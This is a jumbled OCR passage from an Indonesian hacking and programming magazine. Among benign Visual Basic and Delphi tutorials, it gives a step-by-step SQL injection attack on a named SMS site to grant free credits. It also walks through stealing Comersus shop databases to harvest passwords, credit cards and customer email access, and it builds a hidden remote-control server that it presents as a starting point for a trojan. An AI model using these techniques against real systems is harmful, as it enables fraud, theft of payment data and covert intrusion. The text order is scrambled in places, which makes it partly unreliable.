5. Proses penyerangan akan dimulai, anda masuk ke members direktory yang URL-nya adalah www.yepcell.com/members.asp lalu masukan debuging code ' having 1=1- di kolom username dan masukan sembarang password di kolom password.

3. Anda harus mendaftar dulu untuk menjadi anggota supaya bisa mengirim SMS. Isikan data diri anda; semuanya boleh palsu kecuali nomor handphone. Dalam contoh ini kita buat userID dengan nama yamakasi. Sebelumnya anda dapat menguji apakah situs ini memakai SQL. Cara mengujinya dapat pada input box login dengan string yang telah dibahas di atas. 6. Nah, keluar error page-nya, disitu dijelaskan:
Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'YepCell_membersDB.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. nah kita tahu bahwa ada table Yepcell_membersDB dan ada field UserID, ini adalah informasi berharga. untuk itu siapa tahu ada lagi filed lainnya, jadi kita masukan string ' GROUP BY YepCell_membersDB -

28

NeoTek Vol. IV No. 05

NeoTekno
7. Lalu akan muncul lagi error-nya
Error Type: Microsoft OLE DB Provider for ODBC Drivers (0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Column 'YepCell_membersDB.Password' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause nah ada lagi fieldnya yaitu Password, coba lagi kita inject mungkin ada lagi field lainnya dengan ' GROUP BY YepCell_membersDB.Password --

...tapi ternyata error-nya kembali ke awal lagi, berarti ada dua field dalam satu table YepCell_membersDB

admin menemukan keganjilan di database-nya bisa saja dia men-disable account kita bahkan men-disable pengiriman SMS ke Indonesia. Hal ini terjadi pada situs www.phunkyphones.net 8. Karena sejak awal kita melakukan SQL Injection ini untuk menambah Credits (string khusus penghitung SMS) di situs ini, maka kita ubah account kita dengan injeksi ini. Perintah UPDATE adalah perintah SQl yang berguna untuk mengubah atau memperbaiki data dalam suatu field di table yang memuat field itu, dengan kode ' UPDATE [nama_table] set [field1] = [nilai1] where kondisi ; Jadi dengan info yang kita dapatkan dari error page yang tadi maka kita dapat membuat string-nya ' UPDATE YepCell_membersDB set Credits = 100 where UserID ='yamakasi' kita klik submit lalu...

Apabila anda adalah web admin, semua ini dapat anda hindari dengan men-disable special character atau wild character di situs anda, dan membatasi input char. Seperti halnya dengan mempelajari bahasa assembly untuk meng-crack suatu program, mempelajari SQL tidaklah sulit dan SQL Injection ini dapat meningkatan minat untuk mempelajari bahasa pemrograman database ini, agar nantinya dapat menghasilkan sesuatu. Untuk melengkapi artikel ini silahkan anda mengunjungi link-link yang membahas tentang SQL Injection ini:
www.sqlsecurity.com bosen.net/releases/?id=35 www.spidynamics.com www.sensepost.com www.sony-ak.com www.neoteker.or.id Tutorial ini diharapkan hanya sebagai bahan pembelajaran dan penulis tidak bertanggung jawab atas perbuatan yang ditimbulkan dari artikel ini. Dalam sebuah perbincangan di IRC ada seseorang dengan nickname ftp_geo, dia bilang sekarang u belajar SQL untuk hacking tapi nanti u make SQL untuk menghasilkan duit. Regardz kepada sony-ak dan alphacentury atas tutor online-nya, serta target-targetnya.

9. Nah, error... Tapi jangan khawatir tidak semua berjalan mulus tapi kita cek sajalah account kita. 10. Jreeeng... terlihat Credits kita bertambah menjadi seratus. Artinya kita telah sukses menginjeksi database situs itu dengan perintah SQL dasar tadi dan bukan dengan cara carding. Sekarang anda bisa ber-SMS ria sepuasnya. Namun kadang-kadang SMS gateway situs ini sering down dan bahkan apabila sang

Vol. IV No. 05 NeoTek

29

NeoTekno

Comersus Shopping Cart Bug
Andi Ismayadi (Fuzk3_kendi@yahoo.com) membahas Comersus, shopping cart yang banyak digunakan dalam situs-situs e-commerce. Database-nya dalam format Microsoft Access, yang mudah di-download dan tool untuk meng-crack password database itu banyak tersedia.
CART32, KINI KEMBALI muncul bug pada shopcart baru yaitu Comersus. Comersus merupakan salah satu software shopping cart berbasis ASP yang sifatnya open source, meskipun tetap komersial (bug Cart32 dan kelemahan Shopper.cgi dibahas di NeoTek III/05). Comersus pertama kali di-release pada tahun 2000. Belakangan ini diketahui memiliki sedikit kelemahan pada sistemnya, seperti halnya kompatriotnya vsap dulu yang sampai sekarang juga memiliki masalah yang hampir sama. Kelemahannya adalah kesalahan admin meletakkan informasi database-nya pada direktori publik sehingga dengan

WE B HAC K I N G

S

ETELAH ADANYA BUG PADA

sedikit script pada browser kita, dapat men-download database Comersus itu. Bug ini pertama kali dipublikasikan di Indonesia oleh sebuah Komunitas Security Indonesia http://bosen.net. Untuk mengeksploitasi bug ini anda perlu dibantu tool yang dapat men-decrypt isi database tersebut. Tool itu dapat anda download di: http://bosen.net/releases/DecryptComersus.exe Ada dua tools di sini. Yang satu merupakan programnya dan satunya lagi teks yang berisi decrypter. Mari kita bahas lebih jauh tentang bug yang satu ini.

Download Tool dan Mencari Sasaran

1

MASUK KE SITUS BOSEN.NET
Download tool-nya di http:bosen.net/releases, lihat bagian bosen-tools.4.txt, yaitu Comersus Password Cracker by Thunder T.

2

DAPATKAN LINK DOWNLOAD-NYA
Amati link ke situs tools-nya. Harus dua tools yang didownload.

3

MENCARI SITUS-SITUS E-COMMERCE
Buka THC search engine Google.com lalu pindah ke bagian directory shop.

4

MENCARI YANG MENGGUNAKAN COMERSUS
Ketikkan keyword seperti: comersus, powered by comersus, comersus shopcart, ataupun lainnya yang serupa.

30

NeoTek Vol. IV No. 05

NeoTekno Download dan Database Password Cracking

5

BUKA SITUS SASARAN
Buka situs Comersus sasaran, lalu ketikkan bug Comersusnya: /comersus/database/comersus.mdb atau /database/comersus.mdb

6

DOWNLOAD DATABASE
Ketika anda menekan enter setelah memasukkan bug tadi, maka akan tampil request download dari target yang akan men-download databasenya ke hard disk anda.

6

SAVE SEBAGAI FILE .REG
Setelah di-save, database ini dapat dibuka menggunakan MS Access, karena format database-nya dibuat dengan MS Access. Setelah itu anda dapat membuka bagian admin, credit card, atau costumer-nya untuk melihat data-data berharga di sini. Database ini di-encrypt dan dilindungi password sehingga anda tidak dapat langsung menerjemahkannya tanpa decrypter yang anda download.

8

MENGGUNAKAN DECRYPTER
Buka decrypternya.

9

DECRYPT PASSWORD
Copy-paste kan password tadi ke kolom decrypter-nya lalu tekan tombol Decrypt. Nah anda dapat melihat password-nya setelah di decrypt

10

MENGINTIP EMAIL JUGA
Selain mendapatkan data credit card (kalau beruntung) anda dapat juga melihat isi email para costumer karena logikanya setiap orang pasti memiliki password yang sama pada setiap emailnya.

Tip Pengamanan: Bagi para pengusaha e-commerce yang memakai shop cart ini, jangan meletakkan database anda di direktori publik dan kosongkan data credit card dan letakkan password ke tab lain yang lebih aman. Vol. IV No. 05 NeoTek
31

NeoTutor

Email Client dengan WINSOCK
Dalam Visual Basic Workshop kali ini, Wawan Ridwan (iniemailwawan@telkom.net) kembali membahas cara membuat email client sendiri. Kali ini dengan memanfaatkan Microsoft Winsock Control.
email client sendiri dengan Visual Basic? Artikel tersebut berjudul Membuat Email Client Sendiri. dan diterbitkan di NeoTek IV/03. Kalau tidak ingat atau belum membaca artikel tersebut, ya sudah, baca saja artikel ini. Dalam artikel yang lalu, saya berbagi pengalaman tentang cara membuat email client sendiri dengan memanfaatkan file pustaka dvmailer.dll buatan Geocel. Sekarang saya akan berbagi pengalaman lagi dengan anda tentang hal yang sama. Akan tetapi dalam artikel ini, kita akan membuat email client dengan memanfaatkan salah satu komponen dalam Visual Basic yakni Microsoft Winsock Control.

VI S UAL BAS I C WO R KS H O P

M

ASIH INGAT ARTIKEL SAYA TENTANG CARA MEMBUAT

Microsoft Winsock Control
Winsocks (Window Sockets) adalah antarmuka (interface) pemrograman jaringan yang digunakan untuk komunikasi data pada berbagai macam protokol jaringan komputer. Sebagai sebuah API, Winsock bekerja berdasarkan konsep socket. Socket adalah sarana transformasi data yang memungkinkan sebuah aplikasi jaringan mengakses data pada sebuah jaringan komputer. Winsock didukung oleh beberapa protokol jaringan, yaitu Internet Protocol (IP), IPX/SPX, NetBios, AppleTalk, ATM, dan Infrared Socket.

Gambar 1. Kotak dialog Components.

Perancangan Interface dan Kelengkapan
Baiklah, tidak usah bertele-tele, takut halamannya habis. Kita akan mulai membuat program email client dengan Winsock. Buka Visual Basic, dalam kotak dialog New Project pilih Standard EXE. Tempatkan dalam form komponen-komponen objek berikut ini: Enam buah object TextBox dengan rincian sbb:
TextBox pertama beri nama txtNamaPenerima, digunakan untuk memasukkan nama penerima email yang kita kirim. TextBox kedua beri nama txtEmailPenerima, digunakan untuk memasukkan alamat email penerima. TextBox ketiga kita beri nama txtNamaPengirim, digunakan untuk memasukkan nama pengirim email. TextBox keempat kita beri nama txtEmailPengirim, digunakan untuk memasukkan alamat email pengirim. TextBox kelima kita beri nama txtEmailServer, digunakan untuk memasukkan SMTP Server. TextBox keenam kita beri nama txtPesan, digunakan untuk memasukkan pesan email kita.

Klik kanan di daerah tool-box, setelah popup menu muncul klik Components, sesaat kemudian muncul kotak dialog Components seperti yang dapat anda lihat Gambar 1. Pada kotak dialog yang muncul seperti yang nampak pada Gambar 1, pilih Microsoft Winsock Control 6.0 (SPS). Kemudian tekan OK. Sesaat kemudian komponen yang kita pilih tadi akan terpasang pada tool-box (Gambar 2). Pada kotak tool-box double-click Microsoft Winsock Control; hasilnya terlihat pada form Gambar 2. Kotak dialog yang sudah kita rancang tadi (Gambar 3).
ToolBox

Pasangkan satu buah object CommandButton, beri nama dengan cmdKirim, tombol ini nantinya digunakan untuk mengeksekusi kode program kita. Komponen yang terakhir yang harus kita pasangkan adalah Microsoft Winsock Control. Silakan anda ambil di tool-box lalu tempatkan dalam form. Jika control Winsock tidak ada dalam tool-box, lakukan langkah berikut ini:
32

Gambar 3. Hasil rancangan form

NeoTek Vol. IV No. 05

NeoTutor
Menyiapkan Subrutin dan Fungsi
Selesai sudah rancangan form yang kita buat berikut berbagai komponen yang kita butuhkan untuk program yang kita inginkan. Langkah berikutnya adalah membuat beberapa subrutin dan fungsi yang akan menjalankan misi program kita. 1. Fungsi PeriksaForm() Pertama, buatlah sebuah fungsi dengan nama PeriksaForm(). Fungsi tersebut akan kita gunakan untuk memeriksa formulir yang diisi oleh user/pengguna. Fungsi tersebut akan memberikan nilai kembalian False jika user mengisi formulir tidak lengkap. Sebaliknya jika user mengisi form email dengan lengkap dan benar maka nilai kembaliannya adalah True. Ketiklah kode untuk fungsi tersebut berikut:
Function PeriksaForm() PesanError = "" If Len(txtNamaPenerima.Text) = 0 Then PesanError = PesanError & "Kolom NAMA PENERIMA harus diisi!!" & vbCrLf End If '-----------------------------------------------If Len(txtEmailPenerima.Text) = 0 Then PesanError = PesanError & "Kolom EMAIL PENERIMA harus diisi!!" & vbCrLf End If '------------------------------------------------If Len(txtNamaPengirim.Text) = 0 Then PesanError = PesanError & "Kolom NAMA PENGIRIM harus diisi!!" & vbCrLf End If '------------------------------------------------If Len(txtEmailPengirim.Text) = 0 Then PesanError = PesanError & "Kolom EMAIL PENGIRIM harus diisi!!" & vbCrLf End If '------------------------------------------------If Len(txtEmailServer.Text) = 0 Then PesanError = PesanError & "Kolom SMTP Server harus diisi!!" & vbCrLf End If If Len(PesanError) <> 0 Then MsgBox PesanError, vbExclamation, "SalomeWinsock" PeriksaForm = False Else PeriksaForm = True End If End Function

3. Subrutin KirimEmailnyaDong() Langkah berikutnya kita buat lagi satu buah subrutin. Subrutin ini adalah kode utama yang akan menjalankan misi kita yaitu mengirimkan email. Nama untuk rutin tersebut adalah KirimEmailnyaDong(). Berikut ini kode rutin tersebut yang harus anda ketikkan:
Sub KirimEmailnyaDong(SMTP_Server As String, NamaPengirim As String, EmailPengirim As String, NamaPenerima As String, EmailPenerima As String, Judul As String, Pesan As String) Dim Tanggal As String Dim Satu As String, Dua As String, Tiga As String Dim Empat As String, Lima As String, Enam As String Dim Tujuh As String With Winsock1 If .State = sckClosed Then Tanggal = Format(Date, "Ddd") & ", " & Format(Date, "dd Mmm YYYY") & " " & Format(Time, "hh:mm:ss") & "" & " -0600" Satu = "mail from: " & EmailPengirim & vbCrLf Dua = "rcpt to: " & EmailPenerima & vbCrLf Tiga = "Date: " & Tanggal & vbCrLf ' Tanggal kirim email Empat = "From: """ & NamaPengirim & """ <" & EmailPengirim & ">" + vbCrLf ' Email pengirim Lima = "To: " & EmailPenerima & vbCrLf ' Email penerima Enam = "Subject: " & Judul & vbCrLf ' Judul email Tujuh = Pesan & vbCrLf ' Pesan email Sembilan = "X-Mailer: STMP Salome2005 " .LocalPort = 0 .Protocol = sckTCPProtocol ' Pilih protocol TCP .RemoteHost = SMTP_Server ' SMTP Server .RemotePort = 25 ' Set port SMTP : 25 .Connect ' Sambuuuuuuuu.....ng Tunggu ("220") StatusTxt.Caption = "Connecting...." .SendData ("HELO Wawan Ridwan" & vbCrLf) Tunggu ("250") StatusTxt.Caption = "Connected" .SendData (Satu) StatusTxt.Caption = "Pesan dikirim..." Tunggu ("250") .SendData (Dua) Tunggu ("250") .SendData ("data" & vbCrLf) Tunggu ("354") .SendData (Empat & Tiga & Sembilan & Lima & Enam & vbCrLf) .SendData (Tujuh & vbCrLf) .SendData ("." & vbCrLf) Tunggu ("250") .SendData ("quit" & vbCrLf) StatusTxt.Caption = "Disconnect..." Tunggu ("221") .Close Else MsgBox (Str(.State)) End If End With End Sub

2. Subrutin Tunggu() Berikutnya kita buat subrutin Tunggu(). Ketikkan kode berikut ini:
Sub Tunggu(KodeRespon As String) Start = Timer While Len(Response) = 0 Tmr = Start - Timer DoEvents If Tmr > 50 Then MsgBox "SMTP service error!" & vbCrLf & "Tidak ada response", 64, "SalomeWinsock" Exit Sub End If Wend While Left(Response, 3) <> KodeRespon DoEvents If Tmr > 50 Then MsgBox "SMTP service error : " + KodeRespon + " Kode: " + Response, 64, "SalomeWinsock" Exit Sub End If Wend Response = "" End Sub

Kode yang ketik tadi adalah kode utama yang bertugas mengirim email kita. Pada bagian pertama kita siapkan header email. Berikutnya kita siapkan properties untuk Winsock, protocol kita pilih TCP. RemoteHost kita masukkan dengan SMTP yang akan diisikan oleh user dalam kolom object TextBox txtEmailServer. Vol. IV No. 05 NeoTek
33

NeoTutor
Finishing
Langkah berikutnya adalah memasukkan kode ke tombol CmdKirim. Tombol ini yang nantinya akan menjadi pemicu pengiriman email kita. Silakan double-click tombol tersebut dan masukkan kode program berikut ini:
Private Sub CmdKirim_Click() If PeriksaForm() Then KirimEmailnyaDong txtEmailServer.Text, txtNamaPengirim.Text, txtEmailPengirim.Text, txtNamaPenerima.Text, txtEmailPenerima.Text, txtJudul.Text, txtPesan.Text StatusTxt.Caption = "Email dikirim..." Beep Close End If End Sub

Error Checking
Jika koneksi mengalamai kegagalan Winsock akan memberikan event Winsock_Error. Untuk mengetahui apakah koneksi berhasil atau tidak kita perlu memasangkan kode kecil dalam event tersebut. Double-click pada control Winsock dan pilih Private Sub Winsock1_Error, selanjutnya ketik kode berikut ini:
Private Sub Winsock1_Error(ByVal Number As Integer, Description As String, ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String, ByVal HelpContext As Long, CancelDisplay As Boolean) MsgBox "Winsock Error: #" & Number & vbCrLf & _ Description End Sub

Silakan Coba Kirim Email
Sampai di sini program kita sudah selesai. Silakan anda coba dengan mengisi form pengiriman email kita pada kolom-kolom yang semestinya. Dan tekan tombol kirim. Dengan Microsoft Winsock Control selain untuk membuat program emil client anda bisa membuat program program client server lain, seperti chat, file upload/download, dll. Selamat berkarya!

komputer orang lain atau mengutak-atik komputer orang lain tanpa menyentuh komputernya? Kegiatan remote control ini selalu merupakan topik yang menarik, terlihat dari populernya software remote control terang seperti VNC, Virtual PC, ataupun COOL! Remote Control, maupun yang gelap seperti misalnya berbagai jenis trojan. Membuat program remote control sendiri sebenarnya mudah saja dan pada kesempatan kali ini penulis akan mencoba membahasnya untuk para pembaca setia NeoTek. Sebagai catatan, dari apa yang nantinya akan anda coba sesuai dengan yang telah diterangkan, jika sampai terjadi hal-hal yang tidak diinginkan, janganlah menyalahkan penulis. Juga demi menjaga kreativitas anda, penulis hanya menyampaikan hal-hal yang dianggap perlu saja sesuai dengan informasi yang ingin disampaikan sebagai tambahan pengetahuan bagi kita semua.

P

ERNAHKAH ANDA TERPIKIR UNTUK MENGENDALIKAN

Microsoft Visual Basic
Program remote control berikut yang akan kita bahas kali ini, aslinya bukan buatan penulis sendiri, melainkan buatan teman belajar bersama penulis dalam mempelajari pemrograman Visual Basic. Kami memang belajar bersamasama dalam satu komputer, berbagai sumber yang yang kami gali dari internet, diskusi bersama jika menemukan kesulitan, dan lain-lain. Penulis mengharapkan, semoga pembaca telah memiliki sedikit dasar pemograman ini agar tidak kesulitan dalam pembuatannya. Dalam pembahasan yang lalu-lalu penulis sendiri sudah berapa kali mengangkat mengenai pemrograman Visual basic. Namun bila anda benar-benar awam dalam hal pemrograman Visual Basic, silakan buka kembali NeoTek IV/02 yang membahas dasar-dasar Visual Basic. Sama seperti program remote control pada umumnya, yang terdiri dari dua file *.exe yaitu:
1. Server.exe; sang korban (yang ditanam di komputer orang yang nantinya akan dikendalikan) 2. Client.exe; sang preman (pengendali yang mejalankan pengendalian terhadap sang korban) Nb : Nama yang digunakan tidak harus demikian. Dapat nama apa saja sesuka hati.
Private Sub Form_Load() Winsock1.LocalPort = 5578 Winsock1.Listen End Sub Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long If win.State <> sckClosed Then Winsock1.Close Winsock1.Accept requestID End Sub Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) Dim perintah As String Winsock1.GetData perintah If perintah = "pain" Then Shell "pbrush.exe", vbNormalNoFocus End If End Sub Listing 1.

Baru Mengenal Visual Basic?
Bagi yang baru mengenal Visual basic, ada baiknya membaca dulu artikel-artikel sebelumnya, khususnya dalam seri Visual basic Workshop sebagai berikut: VB Workshop: Mengenal Visual Basic
NeoTek IV/02 NeoTek IV/03 NeoTek III/11 NeoTek III/11 NeoTek III/12

VB Workshop: Membuat Notepad Sendiri Visual Basic: Fake Program Buatan Sendiri Visual Basic: Program Jahat Buatan Sendiri VB Workshop: Program Penggoda yang Berbahaya VB Workshop: Password Cracker Buatan Sendiri VB Workshop: Membuat Program Usil VB Workshop: Membuat Email Client Sendiri VB Workshop: Email Client dengan WINSOCK VB Workshop: Remote Control Buatan Sendiri VB Workshop: Screen Saver Buatan Sendiri

NeoTek IV/02 NeoTek IV/02 NeoTek IV/03 NeoTek IV/05 NeoTek IV/05 NeoTek IV/05

34

NeoTek Vol. IV No. 05

NeoTutor

Remote Control Buatan Sendiri
MA Rody Candera (odyxb@melva.org) bersama rekannya h3r01n@hotmail.com berbagi pengalaman mengembangkan program remote control dengan Visual Basic yang dapat anda kembangkan sendiri menjadi trojan.

VI S UAL BAS I C WO R KS H O P

1

INSERT COMPONENT
Klik Project '> Components toolbar Ctrl+T. Pada tab Control pilih Microsoft Winsock Control 6.0 dengan scroll ke bawah. Tick di kotaknya, lalu Apply atau Enter. Akan muncul komponen baru pada toolbox di sebelah kiri

2

KOMPONEN BARU PADA FORM
Klik untuk menanam di form dengan pengaturan properties: Form1 Caption > Server.Exe (judul/title) Visible > False (tampilan program hilang saat dieksekusi) Name > Win

3

FILE SYSOC.INF
Selesai dengan perancangan form dan pengaturan properties, selanjutnya adalah coding. Double click pada form kemudian ketikkan kode listing programnya. Kode listing program dapat anda lihat pada Listing 1.

4

KOMPILASI SERVER.EXE
Selanjutnya kompilasi, mengubah semua menjadi file *.exe. Caranya: File > Make Project1.exe beri nama Server.exe pada kotak file name dari menu window Make Project. Selesai satu...

1

MEMBUAT CLIENT.EXE
Buka project baru untuk membuat client.exe: File > New Project. Akan muncul menu window untuk memilih form yang kita butuhkan. Pilih Standar.exe lalu klik OK.

2

TAMPILAN CLIENT.EXE
Rancang tampilan daripada form untuk client.exe seperti tampak pada gambar dengan menambahkan komponen dari toolbox. Setelah selesai, tambahkan juga komponen winsock.

Private Sub Form_Unload(Cancel As Integer) Winsock1.Close End Sub Private Sub Command1_Click() Winsock1.RemotePort = 5578 Winsock1.RemoteHost = Text1.Text Winsock1.Connect End Sub Private Sub Command2_Click() Dim perintah As String perintah = "pain" Winsock1.SendData perintah Listing 2. End Sub

3

KODE PROGRAM CLIENT
Selanjutnya tuliskan kode program untuk client.exe seperti terlihat pada gambar. Listing program dapat terdapat pada Listing 2.

4

KOMPILASI CLIENT.EXE
Terakhir adalah mengkompilasi. File > Make Project1.exe... dan pada menu window Make Project kotak isian File Name masukkan Client.exe.

Kreativitas anda benar-benar diharapkan untuk dapat mengembangkan program ini yang sebenarnya dapat juga melakukan restart, shutdown, menghapus file, membuka window explorer, freeze monitor, dlsb. Source program ini dapat anda jumpai di dalam CD NeoTek kali ini.

Vol. IV No. 05 NeoTek

35

NeoTutor

Screen Saver Buatan Sendiri
Dalam Visual Basic Workshop kali ini, MA Rody Candera (odyxb@melva.org) membahas cara memanfaatkan untuk membuat screen saver sendiri yang akan menjadi komponen untuk program-program lain di bahasan mendatang
ASANYA MAKIN ASIK SAJA MENJELAjahi kemampuan Visual Basic (VB). VB yang dianggap oleh sebagian besar orang kurang begitu mampu untuk menyaingi C, ternyata masih tetap asyik untuk ditelaah program apa saja yang dapat dihasilkan dengan memanfaatkannya. Saat ini semakin ramai program yang dibuat dengan menggunakan VB baik free maupun non-free hadir menghiasi komputer di dunia, mungkin komputer anda juga. Kali ini adalah membuat screen saver untuk menghiasi monitor anda, dan pembahasannya akan dibuat berkesinambungan dengan artikel-artikel berikutnya nanti sebagai hasil serapan atau aplikasi dari pembahasan kali ini. Pembahasan VB Workshop yang akan mengikuti artikel ini nantinya adalah PC Protector Buatan Sendiri, MP3 Player Buatan Sendiri, dan Encrypter dan Decrypter Buatan Sendiri. Anda sebagai pengguna komputer tentu mengerti benar apa itu screen saver. Aplikasi screen saver telah menjadi bagian yang tidak terlupakan hampir di semua sistem operasi yang ada. Walaupun hanya menjadi bagian yang tidak begitu terlalu penting, tetapi sampai saat ini aplikasi screen saver selalu hadir sebagai pendukung sistem operasi yang diwakilinya.

VI S UAL BAS I C WO R KS H O P

R

Gambar 2. Bidang kerja Visual Basic.

1. ToolBox
ToolBbox, dalam ke Bahasa Indonesia artinya kirakira Kotak Perkakas yang berisi komponenkomponen yang sangat membantu untuk mewujudkan keinginan kita membuat program menggunakan VB yang akan menjadi penghias wajah atau layout dari program-program lain buatan anda nantinya.

Menjalankan Visual Basic
Mari kita mulai teknis pembuatannya. Seperti biasa, aktifkan Visual Studio VB anda sebagai syarat utama untuk membuat program dengan VB. Berikut dijelaskan langkah-langkah pembuatan sebagai panduan anda.

Gambar 2. Bidang kerja Visual Basic.

2. Components
Timer Pertama kita membutuhkan komponen Timer sejumlah 16 buah dan tidak dibuat menjadi control array. Control array akan dijelaskan pada langkah yang berikutnya. Image Disini diperlukan 11 komponen Image dan dibuat menjadi control array. Untuk membuat komponen image menjadi control array adalah dengan melakukan copy pada komponen image1 lalu paste-kan pada form, yang akan menampilkan lauyar dialog konfirmasi yang menanyakan apakah akan menjadikannya control array. Tekan tombol Yes. Lakukan berulang-ulang untuk ke-11 komponen image. Konfirmasi hanya terjadi sekali saja.

Gambar 1. Menjalankan Visual Basic 36

NeoTek Vol. IV No. 05

NeoTutor
Form1 Klik Form untuk memulai menentukan properties yang akan diwakilkannya nanti. Pada windows Properties cari dan sorot bagian BackColor, pilih warna sesuai keinginan anda. Dalam hal ini sebagai contoh dipilih warna hitam. Untuk properties Form1, cukup itu saja yang dilakukan
Gambar 7. Properties pada Form 1.

Timer Anda sesuai untuk properties dari tiap-tiap komponen timer berdasarkan tabel berikut: No.
1. 2. 3. 4. 5. 6. 7. 8. 9. 10. 11. 12. 13. 14. 15. 16.

Komponen
Timer 1 Timer 2 Timer 3 Timer 4 Tag Timer 5 Timer 6 Timer 7 Tag Timer 8 Tag Timer 9 Timer 10 Timer 11 Timer 12 Timer 13 Timer 14 Timer 15 Timer 16

Properties
Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval Interval

Nilai
0 20000 0 0 0 0 0 100 0 5000 0 1 1 1 1000 10 1 1 1

Gambar 4 dan 5. Timer dan Image sebagai control array.

3. Properties
Tahap berikutnya adalah menentukan properties. Ini penting dilakukan demi menghasilkan program yang sesuai dengan anda inginkan. Perhatikan window properties yang terdapat di sebelah kanan dari window Visual Studio anda. Klik event Properties untuk menentukan event yang akan ditentukan propertiesnya (perhatikan Gambar 6b kedua dari point ini).

Image Sebelum menentukan properties tiap-tiap komponen image, anda membutuhkan sebuah icon. Untuk contoh berikut penulis menggunakan contoh icon yang telah disediakan oleh Microsoft Studio yaitu icon Smile. Untuk tiap komponen image properties yang ditentukan diperlukan Picture dan cari icon yang sesuai.

a

b

c Gambar 8. Menggunakan suatu icon untuk komponen Image.

Gambar 6. Menentukan properties.

Vol. IV No. 05 NeoTek

37

NeoTutor
Gambar 9.

DELPHI WORKSHOP
Dalam Delphi Workshop kali ini, Happy Candraleka (cakrabirawa@mail.ru) membahas cara mengemas program karya anda menjadi suatu installer tunggal.
seorang software developer akan mengemas program yang dibuatnya dalam bentuk installer. Dengan installer, maka distribusi paket software hanya berupa file setup tunggal. Di samping itu, end-user yang akan menggunakan program tersebut cukup mengikuti wizard instalasi sehingga proses instalasi program pada komputernya berjalan secara otomatis dan memudahkan. Pada tutorial kali ini akan digunakan perangkat pembuat installer Inno Setup versi 3.0.7 yang karya Jordan Russell. Alasan dipilihnya perangkat ini adalah karena merupakan perangkat untuk membuat installer yang cukup baik, memenuhi kebuDOWNLOAD & INSTALASI tuhan para software Masuk ke http://www.jrsoftware.org developer secara untuk mendapatkan Inno Setup 3. umum dalam memFile yang Anda dapatkan adalah buat installer. isetup-3.0.7.exe (921 KB). Install perangkat tersebut ke komputer Perlu digarisbawahi Anda. Ikuti saja wizard yang telah lagi, perangkat ini disediakan. tersedia sebagai freeware. Lebih hebohnya lagi, Jordan Russell berbaik hati mempersilakan siapa saja untuk memperoleh kode sumber dari Inno Setup yang dalam bahasa Delphi. Kita akan membuat installer untuk program Tweakid.exe yang pernah dibahas pada NeoTek III/8. File lain yang dibuMULAI MEMBUAT INSTALLER tuhkan dalam simuJalankan Inno Setup 3 yang telah lasi ini adalah file terinstal. Pada kotak dialog License.txt dan file Welcome, pilih opsi Create a new General.txt yang ada script file using the Script Wizard, di folder Windows. tekan tombol OK. Akan tampil jendela Inno Setup Script Wizard, Ketiganya hanya tekan saja tombol Next. sebagai contoh, anda ganti dengan file lain yang anda buat.

Inno Setup

Coding
Anda sekarang berada pada tahap akhir yaitu menuliskan kode program. List kode program selengkapnya dapat anda lihat pada source yang disertakan pada CD. Untuk menuliskan kode, penempatan penulisannya pada kode editor. Untuk mengaktifkan kode editor, bisa anda mulai dari menu standar View > Code atau mengklik gambar pertama di window Project.

P

ADA PROSES AKHIR PEMBUATAN SUATU PAKET SOFTWARE,

1

Gambar 10 dan 11.

Uji Coba
Selesai sudah proyek anda, silakan anda uji untuk melihat hasilnya... Tekan tombol F5 pada keyboard kurang lebih hasilnya seperti yang terlihat pada Gambar 12:

2

Gambar 12. 38

NeoTek Vol. IV No. 05

NeoTutor

3

APPLICATION INFORMATION
Pada jendela ini lengkapi dengan data-data aplikasi Anda. Misalnya Tweakid; Tweakid versi 1.0; Neotek, Tbk; dan http://www.neotek.co.id; untuk data Application name sampai Application website.

4

APPLICATION DIRECTORY
Selanjutnya, isikan dengan Program Files directory pada Application destination base directory, dan Neotek\Tweakid pada kotak Application directory name. Biarkan isian yang lainnya dan tekan tombol Next.

5

APPLICATION FILES
Di jendela ini, tekan tombol Browse dan tentukan file exe yang bersangkutan. Dalam hal ini dipilih file Tweakid.exe. Bila ada file lain yang ingin ditambahkan tekan tombol Add file(s). Tambahkan file License.txt dan General.txt dari C:\Windows

6

APPLICATION ICON
Berikutnya, isikan dengan Neotek\Tweakid pada kotak Application Start Menu folder name. Beri tanda check pada opsi Allow user to change start menu folder name, Create Unistall icon… , dan Allow user to create a desktop icon.

7

APPLICATION DOCUMENTATION
Pada tahap selanjutnya, tentukan file license yang akan dimasukkan dan juga file-file lain yang akan ditampilkan sebelum dan sesudah instalasi. Lanjutkan dengan menekan tombol Next.

8

COMPILE AND SAVE
Semuanya telah siap. Tekan tombol Finish. Tekan tombol Yes pada kotak dialog Inno Setup Compiler. Inno Setup akan membuatkan script untuk Anda. Tekan lagi Yes untuk menyimpannya. Kemudian tunggulah proses kompilasinya beberapa saat.

9

RUN
Untuk mencoba melakukan pengetesan instalasi, klik menu Run > Run, atau dengan menekan tombol keyboard F9.

10

OUTPUT
File installer untuk tweakid akhirnya berhasil dibuat. Installer ini berada di folder Output dengan nama setup.exe. Hanya satu file instalasi saja yang dapat Anda distribusikan/copy-kan ke komputer yang lain.

11

AYO DICOBA
Cobalah klik ganda file setup.exe tersebut. Lakukan instalasi program Tweakid ini pada komputer Anda. Hasilnya Tweakid.exe akan terinstal di komputer, dan dibuatkan shortcut pada Start Menu, Desktop, dan juga dibuatkan perangkat uninstall-nya.

Vol. IV No. 05 NeoTek

39

NeoTutor

Cyber Merpati Email Client
Ada beberapa cara membuat email client sendiri. Selain menggunakan Visual Basic pada artikel-artikel sebelumnya, dapat juga menggunakan Delphi 7. Happy Candraleka (cakrabirawa@mail.ru) membahasnya untuk anda.
